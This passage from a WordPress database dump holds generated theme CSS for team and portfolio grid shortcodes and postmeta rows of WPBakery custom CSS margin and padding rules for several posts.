.dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-fd084c7b2d27f05facb23e338620528e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(35674,3066,'_wpb_post_custom_layout','default'),
(35675,5220,'_wpb_post_custom_layout','default'),
(35676,5220,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1692141731943{margin-top: -15px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35677,5220,'_wpb_shortcodes_custom_css_updated','1'),
(35678,5221,'_wpb_post_custom_layout','default'),
(35679,5221,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1692141731943{margin-top: -15px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35680,5221,'_wpb_shortcodes_custom_css_updated','1'),
(35681,5223,'_wpb_post_custom_layout','default'),
(35682,5223,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1692141731943{margin-top: -15px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35683,5223,'_wpb_shortcodes_custom_css_updated','1'),
(35684,5224,'_wpb_post_custom_layout','default'),
